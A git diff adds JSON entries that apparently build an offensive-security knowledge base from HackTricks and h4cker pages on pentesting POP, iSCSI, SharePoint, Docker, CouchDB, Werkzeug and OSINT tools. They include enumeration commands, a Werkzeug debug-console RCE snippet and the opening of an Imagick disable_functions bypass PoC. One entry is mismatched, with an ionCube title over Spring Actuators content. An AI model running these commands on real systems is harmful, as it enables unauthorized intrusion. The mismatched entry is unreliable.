+ "category": "network-services-pentesting",
+ "title": "disable functions php 5.2.4 ioncube extension exploit",
+ "description": "# PHP 5.2.4 ionCube extension Exploit\n\n{{#include ../../../../banners/hacktricks-training.md}}\n\n\n```php\n\n\n**From** [**https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png**](https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png)\n\n## Exploiting Spring Boot Actuators\n\n**Check the original post from** \\[**https://www.veracode.com/blog/research/exploiting-spring-boot-actuators**]",
+ "payloads": [
+ "# Spring Actuators",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## **Spring Auth Bypass**",
+ "",
+ "**From** [**https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png**](https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png)",
+ "## Exploiting Spring Boot Actuators",
+ "**Check the original post from** \\[**https://www.veracode.com/blog/research/exploiting-spring-boot-actuators**]",
+ "### **Key Points:**",
+ "- Spring Boot Actuators register endpoints such as `/health`, `/trace`, `/beans`, `/env`, etc. In versions 1 to 1.4, these endpoints are accessible without authentication. From version 1.5 onwards, only `/health` and `/info` are non-sensitive by default, but developers often disable this security.",
+ "- Certain Actuator endpoints can expose sensitive data or allow harmful actions:",
+ "- `/dump`, `/trace`, `/logfile`, `/shutdown`, `/mappings`, `/env`, `/actuator/env`, `/restart`, and `/heapdump`.",
+ "- In Spring Boot 1.x, actuators are registered under the root URL, while in 2.x, they are under the `/actuator/` base path.",
+ "### **Exploitation Techniques:**",
+ "1. **Remote Code Execution via '/jolokia'**:",
+ "- The `/jolokia` actuator endpoint exposes the Jolokia Library, which allows HTTP access to MBeans."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/spring-actuators.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_f454769386cb.json b/skills/network_services_pentesting_f454769386cb.json
new file mode 100644
index 0000000..364a7ea
--- /dev/null
+++ b/skills/network_services_pentesting_f454769386cb.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_f454769386cb",
+ "category": "network-services-pentesting",
+ "title": "pentesting pop",
+ "description": "# 110,995 - Pentesting POP\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\n**Post Office Protocol (POP)** is described as a protocol within the realm of computer networking and the Internet, which is utilized for the extraction and **retrieval of email from a remote mail server**, making it accessible on the local device. Positioned within the application layer of the OSI model, this protocol enables users to fetch and receive email. The operation of **POP clients** typica",
+ "payloads": [
+ "# 110,995 - Pentesting POP",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "**Post Office Protocol (POP)** is described as a protocol within the realm of computer networking and the Internet, which is utilized for the extraction and **retrieval of email from a remote mail server**, making it accessible on the local device. Positioned within the application layer of the OSI model, this protocol enables users to fetch and receive email. The operation of **POP clients** typically involves establishing a connection to the mail server, downloading all messages, storing these messages locally on the client system, and subsequently removing them from the server. Although there are three iterations of this protocol, **POP3** stands out as the most prevalently employed version.",
+ "**Default ports:** 110, 995(ssl)",
+ "PORT STATE SERVICE",
+ "110/tcp open pop3",
+ "## Enumeration",
+ "### Banner Grabbing",
+ "```bash",
+ "nc -nv 110",
+ "openssl s_client -connect :995 -crlf -quiet",
+ "## Manual",
+ "You can use the command `CAPA` to obtain the capabilities of the POP3 server.",
+ "## Automated"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-pop.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_f668acbc1145.json b/skills/network_services_pentesting_f668acbc1145.json
new file mode 100644
index 0000000..f5a827b
--- /dev/null
+++ b/skills/network_services_pentesting_f668acbc1145.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_f668acbc1145",
+ "category": "network-services-pentesting",
+ "title": "3260 pentesting iscsi",
+ "description": "# 3260 - Pentesting ISCSI\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\nFrom [Wikipedia](https://en.wikipedia.org/wiki/ISCSI):\n\n> In computing, **iSCSI** is an acronym for **Internet Small Computer Systems Interface**, an Internet Protocol (IP)-based storage networking standard for linking data storage facilities. It provides block-level access to storage devices by carrying SCSI commands over a TCP/IP network. iSCSI is used to facilitate data transfers over intranets an",
+ "payloads": [
+ "# 3260 - Pentesting ISCSI",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "From [Wikipedia](https://en.wikipedia.org/wiki/ISCSI):",
+ "> In computing, **iSCSI** is an acronym for **Internet Small Computer Systems Interface**, an Internet Protocol (IP)-based storage networking standard for linking data storage facilities. It provides block-level access to storage devices by carrying SCSI commands over a TCP/IP network. iSCSI is used to facilitate data transfers over intranets and to manage storage over long distances. It can be used to transmit data over local area networks (LANs), wide area networks (WANs), or the Internet and can enable location-independent data storage and retrieval.",
+ "> The protocol allows clients (called initiators) to send SCSI commands (CDBs) to storage devices (targets) on remote servers. It is a storage area network (SAN) protocol, allowing organizations to consolidate storage into storage arrays while providing clients (such as database and web servers) with the illusion of locally attached SCSI disks. It mainly competes with Fibre Channel, but unlike traditional Fibre Channel which usually requires dedicated cabling, iSCSI can be run over long distances using existing network infrastructure.",
+ "**Default port:** 3260",
+ "PORT STATE SERVICE VERSION",
+ "3260/tcp open iscsi?",
+ "## Enumeration",
+ "nmap -sV --script=iscsi-info -p 3260 192.168.xx.xx",
+ "This script will indicate if authentication is required.",
+ "### [Brute force](../generic-hacking/brute-force.md#iscsi)",
+ "### [Mount ISCSI on Linux](https://www.synology.com/en-us/knowledgebase/DSM/tutorial/Virtualization/How_to_set_up_and_use_iSCSI_target_on_Linux)",
+ "**Note:** You may find that when your targets are discovered, they are listed under a different IP address. This tends to happen if the iSCSI service is exposed via NAT or a virtual IP. In cases like these, `iscsiadmin` will fail to connect. This requires two tweaks: one to the directory name of the node automatically created by your discovery activities, and one to the `default` file contained within this directory."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/3260-pentesting-iscsi.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_f7b9fe236646.json b/skills/network_services_pentesting_f7b9fe236646.json
new file mode 100644
index 0000000..ae229b8
--- /dev/null
+++ b/skills/network_services_pentesting_f7b9fe236646.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_f7b9fe236646",
+ "category": "network-services-pentesting",
+ "title": "microsoft sharepoint",
+ "description": "# Microsoft SharePoint \u2013 Pentesting & Exploitation\n\n{{#include ../../banners/hacktricks-training.md}}\n\n> Microsoft SharePoint (on-premises) is built on top of ASP.NET/IIS. Most of the classic web attack surface (ViewState, Web.Config, web shells, etc.) is therefore present, but SharePoint also ships with hundreds of proprietary ASPX pages and web services that dramatically enlarge the exposed attack surface. This page collects practical tricks to enumerate, exploit and persist inside SharePoin",
+ "payloads": [
+ "# Microsoft SharePoint \u2013 Pentesting & Exploitation",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "> Microsoft SharePoint (on-premises) is built on top of ASP.NET/IIS. Most of the classic web attack surface (ViewState, Web.Config, web shells, etc.) is therefore present, but SharePoint also ships with hundreds of proprietary ASPX pages and web services that dramatically enlarge the exposed attack surface. This page collects practical tricks to enumerate, exploit and persist inside SharePoint environments with emphasis on the 2025 exploit chain disclosed by Unit42 (CVE-2025-49704/49706/53770/53771).",
+ "## 1. Quick enumeration",
+ "# favicon hash and keywords",
+ "curl -s https:///_layouts/15/images/SharePointHome.png",
+ "curl -s https:///_vti_bin/client.svc | file - # returns WCF/XSI",
+ "# version leakage (often in JS)",
+ "curl -s https:///_layouts/15/init.js | grep -i \"spPageContextInfo\"",
+ "# interesting standard paths",
+ "/_layouts/15/ToolPane.aspx # vulnerable page used in 2025 exploit chain",
+ "/_vti_bin/Lists.asmx # legacy SOAP service",
+ "/_catalogs/masterpage/Forms/AllItems.aspx",
+ "# enumerate sites & site-collections (requires at least Anonymous)",
+ "python3 Office365-ADFSBrute/SharePointURLBrute.py -u https://"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/microsoft-sharepoint.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_f8ad47944aff.json b/skills/network_services_pentesting_f8ad47944aff.json
new file mode 100644
index 0000000..81e8a21
--- /dev/null
+++ b/skills/network_services_pentesting_f8ad47944aff.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_f8ad47944aff",
+ "category": "network-services-pentesting",
+ "title": "2375 pentesting docker",
+ "description": "# 2375, 2376 Pentesting Docker\n\n{{#include ../banners/hacktricks-training.md}}\n\n### Docker Basics\n\n#### What is\n\nDocker is the **forefront platform** in the **containerization industry**, spearheading **continuous innovation**. It facilitates the effortless creation and distribution of applications, spanning from **traditional to futuristic**, and assures their **secure deployment** across diverse environments.\n\n#### Basic docker architecture\n\n- [**containerd**](http://containerd.io): This is a ",
+ "payloads": [
+ "# 2375, 2376 Pentesting Docker",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "### Docker Basics",
+ "#### What is",
+ "Docker is the **forefront platform** in the **containerization industry**, spearheading **continuous innovation**. It facilitates the effortless creation and distribution of applications, spanning from **traditional to futuristic**, and assures their **secure deployment** across diverse environments.",
+ "#### Basic docker architecture",
+ "- [**containerd**](http://containerd.io): This is a **core runtime** for containers, tasked with the comprehensive **management of a container's lifecycle**. This involves handling **image transfer and storage**, in addition to overseeing the **execution, monitoring, and networking** of containers. **More detailed insights** on containerd are **further explored**.",
+ "- The **container-shim** plays a critical role as an **intermediary** in the handling of **headless containers**, seamlessly taking over from **runc** after the containers are initialized.",
+ "- [**runc**](http://runc.io): Esteemed for its **lightweight and universal container runtime** capabilities, runc is aligned with the **OCI standard**. It is used by containerd to **start and manage containers** according to the **OCI guidelines**, having evolved from the original **libcontainer**.",
+ "- [**grpc**](http://www.grpc.io) is essential for **facilitating communication** between containerd and the **docker-engine**, ensuring **efficient interaction**.",
+ "- The [**OCI**](https://www.opencontainers.org) is pivotal in maintaining the **OCI specifications** for runtime and images, with the latest Docker versions being **compliant with both the OCI image and runtime** standards.",
+ "#### Basic commands",
+ "```bash",
+ "docker version #Get version of docker client, API, engine, containerd, runc, docker-init",
+ "docker info #Get more infomarion about docker settings"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/2375-pentesting-docker.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_f97c32530ad8.json b/skills/network_services_pentesting_f97c32530ad8.json
new file mode 100644
index 0000000..7ec9503
--- /dev/null
+++ b/skills/network_services_pentesting_f97c32530ad8.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_f97c32530ad8",
+ "category": "network-services-pentesting",
+ "title": "disable functions bypass imagick less than 3.3.0 php greater than 5.4 exploit",
+ "description": "# Imagick <= 3.3.0 \u2011 PHP >= 5.4 *disable_functions* Bypass\n\n{{#include ../../../../banners/hacktricks-training.md}}\n\n> The well-known *ImageTragick* family of bugs (CVE-2016-3714 et al.) allows an attacker to reach the underlying **ImageMagick** binary through crafted MVG/SVG input. When the PHP extension **Imagick** is present this can be abused to execute shell commands even if every execution-oriented PHP function is black-listed with `disable_functions`.\n>\n> The original PoC published by R",
+ "payloads": [
+ "# Imagick <= 3.3.0 \u2011 PHP >= 5.4 *disable_functions* Bypass",
+ "{{#include ../../../../banners/hacktricks-training.md}}",
+ "> The well-known *ImageTragick* family of bugs (CVE-2016-3714 et al.) allows an attacker to reach the underlying **ImageMagick** binary through crafted MVG/SVG input. When the PHP extension **Imagick** is present this can be abused to execute shell commands even if every execution-oriented PHP function is black-listed with `disable_functions`.",
+ "> The original PoC published by RicterZ (Chaitin Security Research Lab) in May 2016 is reproduced below. The technique is still regularly encountered during contemporary PHP 7/8 audits because many shared-hosting providers simply compile PHP without `exec`/`system` but keep an outdated Imagick + ImageMagick combo.",
+ "From ",
+ "```php",
+ "# Exploit Title : PHP Imagick disable_functions bypass",
+ "# Exploit Author: RicterZ (ricter@chaitin.com)",
+ "# Versions : Imagick <= 3.3.0 | PHP >= 5.4",
+ "# Tested on : Ubuntu 12.04 (ImageMagick 6.7.7)",
+ "# Usage : curl \"http://target/exploit.php?cmd=id\"",
+ "// Print the local hardening status",
+ "printf(\"Disable functions: %s\\n\", ini_get(\"disable_functions\"));",
+ "$cmd = $_GET['cmd'] ?? 'id';",
+ "printf(\"Run command: %s\\n====================\\n\", $cmd);"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_fa4fb07b1e7e.json b/skills/network_services_pentesting_fa4fb07b1e7e.json
new file mode 100644
index 0000000..5365935
--- /dev/null
+++ b/skills/network_services_pentesting_fa4fb07b1e7e.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_fa4fb07b1e7e",
+ "category": "network-services-pentesting",
+ "title": "5984 pentesting couchdb",
+ "description": "# 5984,6984 - Pentesting CouchDB\n\n{{#include ../banners/hacktricks-training.md}}\n\n## **Basic Information**\n\n**CouchDB** is a versatile and powerful **document-oriented database** that organizes data using a **key-value map** structure within each **document**. Fields within the document can be represented as **key/value pairs, lists, or maps**, providing flexibility in data storage and retrieval.\n\nEvery **document** stored in CouchDB is assigned a **unique identifier** (`_id`) at the document le",
+ "payloads": [
+ "# 5984,6984 - Pentesting CouchDB",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## **Basic Information**",
+ "**CouchDB** is a versatile and powerful **document-oriented database** that organizes data using a **key-value map** structure within each **document**. Fields within the document can be represented as **key/value pairs, lists, or maps**, providing flexibility in data storage and retrieval.",
+ "Every **document** stored in CouchDB is assigned a **unique identifier** (`_id`) at the document level. Additionally, each modification made and saved to the database is assigned a **revision number** (`_rev`). This revision number allows for efficient **tracking and management of changes**, facilitating easy retrieval and synchronization of data within the database.",
+ "**Default port:** 5984(http), 6984(https)",
+ "PORT STATE SERVICE REASON",
+ "5984/tcp open unknown syn-ack",
+ "## **Automatic Enumeration**",
+ "```bash",
+ "nmap -sV --script couchdb-databases,couchdb-stats -p ",
+ "msf> use auxiliary/scanner/couchdb/couchdb_enum",
+ "## Manual Enumeration",
+ "### Banner",
+ "curl http://IP:5984/"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/5984-pentesting-couchdb.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_faa9b57ec25d.json b/skills/network_services_pentesting_faa9b57ec25d.json
new file mode 100644
index 0000000..84017da
--- /dev/null
+++ b/skills/network_services_pentesting_faa9b57ec25d.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_faa9b57ec25d",
+ "category": "network-services-pentesting",
+ "title": "werkzeug",
+ "description": "# Werkzeug / Flask Debug\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Console RCE\n\nIf debug is active you could try to access to `/console` and gain RCE.\n\n```python\n__import__('os').popen('whoami').read();\n```\n\n.png>)\n\nThere is also several exploits on the internet like [this ](https://github.com/its-arun/Werkzeug-Debug-RCE)or one in metasploit.\n\n## Pin Protected - Path Traversal\n\nIn some occasions the **`/console`** endpoint is going to be protected by a p",
+ "payloads": [
+ "# Werkzeug / Flask Debug",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Console RCE",
+ "If debug is active you could try to access to `/console` and gain RCE.",
+ "```python",
+ "__import__('os').popen('whoami').read();",
+ ".png>)",
+ "There is also several exploits on the internet like [this ](https://github.com/its-arun/Werkzeug-Debug-RCE)or one in metasploit.",
+ "## Pin Protected - Path Traversal",
+ "In some occasions the **`/console`** endpoint is going to be protected by a pin. If you have a **file traversal vulnerability**, you can leak all the necessary info to generate that pin.",
+ "### Werkzeug Console PIN Exploit",
+ "Force a debug error page in the app to see this:",
+ "The console is locked and needs to be unlocked by entering the PIN.",
+ "You can find the PIN printed out on the standard output of your",
+ "shell that runs the server"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/werkzeug.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_fe25e3f42ca0.json b/skills/network_services_pentesting_fe25e3f42ca0.json
new file mode 100644
index 0000000..0ed0ae6
--- /dev/null
+++ b/skills/network_services_pentesting_fe25e3f42ca0.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_fe25e3f42ca0",
+ "category": "network-services-pentesting",
+ "title": "angular",
+ "description": "# Angular\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## The Checklist\n\nChecklist [from here](https://lsgeurope.com/post/angular-security-checklist).\n\n* [ ] Angular is considered a client-side framework and is not expected to provide server-side protection\n* [ ] Sourcemap for scripts is disabled in the project configuration\n* [ ] Untrusted user input is always interpolated or sanitized before being used in templates\n* [ ] The user has no control over server-side or client-side templates\n",
+ "payloads": [
+ "# Angular",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## The Checklist",
+ "Checklist [from here](https://lsgeurope.com/post/angular-security-checklist).",
+ "* [ ] Angular is considered a client-side framework and is not expected to provide server-side protection",
+ "* [ ] Sourcemap for scripts is disabled in the project configuration",
+ "* [ ] Untrusted user input is always interpolated or sanitized before being used in templates",
+ "* [ ] The user has no control over server-side or client-side templates",
+ "* [ ] Untrusted user input is sanitized using an appropriate security context before being trusted by the application",
+ "* [ ] `BypassSecurity*` methods are not used with untrusted input",
+ "* [ ] Untrusted user input is not passed to Angular classes such as `ElementRef` , `Renderer2` and `Document`, or other JQuery/DOM sinks",
+ "## What is Angular",
+ "Angular is a **powerful** and **open-source** front-end framework maintained by **Google**. It uses **TypeScript** to enhance code readability and debugging. With strong security mechanisms, Angular prevents common client-side vulnerabilities like **XSS** and **open redirects**. It can be used on the **server-side** too, making security considerations important from **both angles**.",
+ "## Framework architecture",
+ "In order to better understand the Angular basics, let\u2019s go through its essential concepts."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/angular.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_fe976374d6ea.json b/skills/network_services_pentesting_fe976374d6ea.json
new file mode 100644
index 0000000..3d8a90d
--- /dev/null
+++ b/skills/network_services_pentesting_fe976374d6ea.json
@@ -0,0 +1,25 @@
+{
+ "id": "network_services_pentesting_fe976374d6ea",
+ "category": "network-services-pentesting",
+ "title": "1723 pentesting pptp",
+ "description": "# 1723 - Pentesting PPTP\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\n**Point-to-Point Tunneling Protocol (PPTP)** is a method widely employed for **remote access** to mobile devices. It utilizes **TCP port 1723** for the exchange of keys, while **IP protocol 47** (Generic Routing Encapsulation, or **GRE**), is used to encrypt the data that is transmitted between peers. This setup is crucial for establishing a secure communication channel over the internet, ensuring tha",
+ "payloads": [
+ "# 1723 - Pentesting PPTP",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "**Point-to-Point Tunneling Protocol (PPTP)** is a method widely employed for **remote access** to mobile devices. It utilizes **TCP port 1723** for the exchange of keys, while **IP protocol 47** (Generic Routing Encapsulation, or **GRE**), is used to encrypt the data that is transmitted between peers. This setup is crucial for establishing a secure communication channel over the internet, ensuring that the data exchanged remains confidential and protected from unauthorized access.",
+ "**Default Port**:1723",
+ "## Enumeration",
+ "```bash",
+ "nmap \u2013Pn -sSV -p1723 ",
+ "### [Brute Force](../generic-hacking/brute-force.md#pptp)",
+ "## Vulnerabilities",
+ "- [https://www.schneier.com/academic/pptp/](https://www.schneier.com/academic/pptp/)",
+ "- [https://github.com/moxie0/chapcrack](https://github.com/moxie0/chapcrack)",
+ "{{#include ../banners/hacktricks-training.md}}"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/1723-pentesting-pptp.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/networking_076973cf91ab.json b/skills/networking_076973cf91ab.json
new file mode 100644
index 0000000..aeadc11
--- /dev/null
+++ b/skills/networking_076973cf91ab.json
@@ -0,0 +1,27 @@
+{
+ "id": "networking_076973cf91ab",
+ "category": "networking",
+ "title": "tools",
+ "description": "# Networking Tools\n\nThis is a curated list of tools for this category.\n\n---\n\n- [Acunetix Vulnerability Scanner Now With Network Security Scans](http://feedproxy.google.com/~r/PentestTools/~3/dHIr1QsVQYw/acunetix-vulnerability-scanner-now-with.html)\n- [Airshare - Cross-platform Content Sharing In A Local Network](http://feedproxy.google.com/~r/PentestTools/~3/rIOrri5vOIg/airshare-cross-platform-content-sharing.html)\n- [Astsu - A Network Scanner Tool](http://feedproxy.google.com/~r/PentestTools/~3",
+ "payloads": [
+ "# Networking Tools",
+ "This is a curated list of tools for this category.",
+ "- [Acunetix Vulnerability Scanner Now With Network Security Scans](http://feedproxy.google.com/~r/PentestTools/~3/dHIr1QsVQYw/acunetix-vulnerability-scanner-now-with.html)",
+ "- [Airshare - Cross-platform Content Sharing In A Local Network](http://feedproxy.google.com/~r/PentestTools/~3/rIOrri5vOIg/airshare-cross-platform-content-sharing.html)",
+ "- [Astsu - A Network Scanner Tool](http://feedproxy.google.com/~r/PentestTools/~3/UpyJkEUTzUA/astsu-network-scanner-tool.html)",
+ "- [Attack-Surface-Framework - Tool To Discover External And Internal Network Attack Surface](http://feedproxy.google.com/~r/PentestTools/~3/ItlxzRQG16Q/attack-surface-framework-tool-to.html)",
+ "- [Batea - AI-based, Context-Driven Network Device Ranking](http://feedproxy.google.com/~r/PentestTools/~3/OqJ3S2Je1T4/batea-ai-based-context-driven-network.html)",
+ "- [Betwixt - Web Debugging Proxy Based On Chrome DevTools Network Panel](http://feedproxy.google.com/~r/PentestTools/~3/l5D0QslTtdA/betwixt-web-debugging-proxy-based-on.html)",
+ "- [BlueGhost - A Network Tool Designed To Assist Blue Teams In Banning Attackers From Linux Servers](http://feedproxy.google.com/~r/PentestTools/~3/pFM6w1Spwtc/blueghost-network-tool-designed-to.html)",
+ "- [BruteShark - Network Analysis Tool](http://www.kitploit.com/2022/03/bruteshark-network-analysis-tool.html)",
+ "- [CANalyse - A Vehicle Network Analysis And Attack Tool](http://feedproxy.google.com/~r/PentestTools/~3/UCIX_QJVv2U/canalyse-vehicle-network-analysis-and.html)",
+ "- [Capsulecorp-Pentest - Vagrant VirtualBox Environment For Conducting An Internal Network Penetration Test](http://feedproxy.google.com/~r/PentestTools/~3/6FP53ToUZBI/capsulecorp-pentest-vagrant-virtualbox.html)",
+ "- [Caronte - A Tool To Analyze The Network Flow During Attack/Defence Capture The Flag Competitions](http://feedproxy.google.com/~r/PentestTools/~3/nglFKZy7Jk8/caronte-tool-to-analyze-network-flow.html)",
+ "- [Cerbrutus - Network Brute Force Tool, Written In Python](http://feedproxy.google.com/~r/PentestTools/~3/DNMByiC7CXE/cerbrutus-network-brute-force-tool.html)",
+ "- [Cilium - eBPF-based Networking, Security, And Observability](http://feedproxy.google.com/~r/PentestTools/~3/UY91VgCoe8Q/cilium-ebpf-based-networking-security.html)"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/networking/tools.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/osint_40ca88f16a7b.json b/skills/osint_40ca88f16a7b.json
new file mode 100644
index 0000000..cc73300
--- /dev/null
+++ b/skills/osint_40ca88f16a7b.json
@@ -0,0 +1,27 @@
+{
+ "id": "osint_40ca88f16a7b",
+ "category": "osint",
+ "title": "dns zone transfer",
+ "description": "# DNS Zone Transfer\n\n[Digi.ninja](https://digi.ninja/projects/zonetransferme.php) has an amazing explanation of DNS zone transfer attacks and resource for you to practice this in a safe environment. The domain available to practice is `zonetransfer.me` and the two name servers are `nsztm1.digi.ninja` and `nsztm2.digi.ninja`. \n\n```\n# dig axfr @nsztm1.digi.ninja zonetransfer.me\n\n; <<>> DiG 9.9.5-3ubuntu0.6-Ubuntu <<>> axfr @nsztm1.digi.ninja zonetransfer.me\n; (1 server found)\n;; global options: +c",
+ "payloads": [
+ "# DNS Zone Transfer",
+ "[Digi.ninja](https://digi.ninja/projects/zonetransferme.php) has an amazing explanation of DNS zone transfer attacks and resource for you to practice this in a safe environment. The domain available to practice is `zonetransfer.me` and the two name servers are `nsztm1.digi.ninja` and `nsztm2.digi.ninja`.",
+ "# dig axfr @nsztm1.digi.ninja zonetransfer.me",
+ "; <<>> DiG 9.9.5-3ubuntu0.6-Ubuntu <<>> axfr @nsztm1.digi.ninja zonetransfer.me",
+ "; (1 server found)",
+ ";; global options: +cmd",
+ "zonetransfer.me. 7200 IN SOA nsztm1.digi.ninja. robin.digi.ninja. 2014101601 172800 900 1209600 3600",
+ "zonetransfer.me. 300 IN HINFO \"Casio fx-700G\" \"Windows XP\"",
+ "zonetransfer.me. 301 IN TXT \"google-site-verification=tyP28J7JAUHA9fw2sHXMgcCC0I6XBmmoVi04VlMewxA\"",
+ "zonetransfer.me. 7200 IN MX 0 ASPMX.L.GOOGLE.COM.",
+ "zonetransfer.me. 7200 IN MX 10 ALT1.ASPMX.L.GOOGLE.COM.",
+ "zonetransfer.me. 7200 IN MX 10 ALT2.ASPMX.L.GOOGLE.COM.",
+ "zonetransfer.me. 7200 IN MX 20 ASPMX2.GOOGLEMAIL.COM.",
+ "zonetransfer.me. 7200 IN MX 20 ASPMX3.GOOGLEMAIL.COM.",
+ "zonetransfer.me. 7200 IN MX 20 ASPMX4.GOOGLEMAIL.COM."
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/osint/dns-zone-transfer.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/osint_a2dfa15e3b86.json b/skills/osint_a2dfa15e3b86.json
new file mode 100644
index 0000000..7d93d74
--- /dev/null
+++ b/skills/osint_a2dfa15e3b86.json
@@ -0,0 +1,27 @@
+{
+ "id": "osint_a2dfa15e3b86",
+ "category": "osint",
+ "title": "tools",
+ "description": "# Osint Tools\n\nThis is a curated list of tools for this category.\n\n---\n\n- [10Minutemail - Python Temporary Email](http://feedproxy.google.com/~r/PentestTools/~3/6P5wkV_3yTU/10minutemail-python-temporary-email.html)\n- [AIL Framework - Framework for Analysis of Information Leaks](http://feedproxy.google.com/~r/PentestTools/~3/91FEC7M0yz8/ail-framework-framework-for-analysis-of.html)\n- [AdvPhishing - This Is Advance Phishing Tool! OTP PHISHING](http://feedproxy.google.com/~r/PentestTools/~3/9rL0P-w",
+ "payloads": [
+ "# Osint Tools",
+ "This is a curated list of tools for this category.",
+ "- [10Minutemail - Python Temporary Email](http://feedproxy.google.com/~r/PentestTools/~3/6P5wkV_3yTU/10minutemail-python-temporary-email.html)",
+ "- [AIL Framework - Framework for Analysis of Information Leaks](http://feedproxy.google.com/~r/PentestTools/~3/91FEC7M0yz8/ail-framework-framework-for-analysis-of.html)",
+ "- [AdvPhishing - This Is Advance Phishing Tool! OTP PHISHING](http://feedproxy.google.com/~r/PentestTools/~3/9rL0P-wabG0/advphishing-this-is-advance-phishing.html)",
+ "- [BaseQuery - A Way To Organize Public Combo-Lists And Leaks In A Way That You Can Easily Search Through Everything](http://feedproxy.google.com/~r/PentestTools/~3/xagTe4W9uT4/basequery-way-to-organize-public-combo.html)",
+ "- [Brute_Force - BruteForce Gmail, Hotmail, Twitter, Facebook & Netflix](http://feedproxy.google.com/~r/PentestTools/~3/Bovu29IujOM/bruteforce-bruteforce-gmail-hotmail.html)",
+ "- [Buster - Find Emails Of A Person And Return Info Associated With Them](http://feedproxy.google.com/~r/PentestTools/~3/y2mAo4j8218/buster-find-emails-of-person-and-return.html)",
+ "- [Combobulator - Framework To Detect And Prevent Dependency Confusion Leakage And Potential Attacks](http://www.kitploit.com/2022/01/combobulator-framework-to-detect-and.html)",
+ "- [CredsLeaker v3 - Tool to Display A Powershell Credentials Box](http://feedproxy.google.com/~r/PentestTools/~3/9y08bFtnHNg/credsleaker-v3-tool-to-display.html)",
+ "- [DataSurgeon - Quickly Extracts IP's, Email Addresses, Hashes, Files, Credit Cards, Social Secuirty Numbers And More From Text](http://www.kitploit.com/2023/03/datasurgeon-quickly-extracts-ips-email.html)",
+ "- [EMAGNET - Tool For Find Leaked Databases With 97.1% Accurate To Grab Mail + Password Together From Pastebin Leaks](http://feedproxy.google.com/~r/PentestTools/~3/YIAfk2yhMRY/emagnet-tool-for-find-leaked-databases.html)",
+ "- [Email-Prediction-Asterisks - Script That Allows You To Identify The Emails Hidden Behind Asterisks](http://www.kitploit.com/2022/05/email-prediction-asterisks-script-that.html)",
+ "- [Email-Vulnerablity-Checker - Find Email Spoofing Vulnerablity Of Domains](http://www.kitploit.com/2023/02/email-vulnerablity-checker-find-email.html)",
+ "- [Espoofer - An Email Spoofing Testing Tool That Aims To Bypass SPF/DKIM/DMARC And Forge DKIM Signatures](http://www.kitploit.com/2022/01/espoofer-email-spoofing-testing-tool.html)"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/osint/tools.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/osint_f174065a718e.json b/skills/osint_f174065a718e.json
new file mode 100644
index 0000000..d033770
--- /dev/null
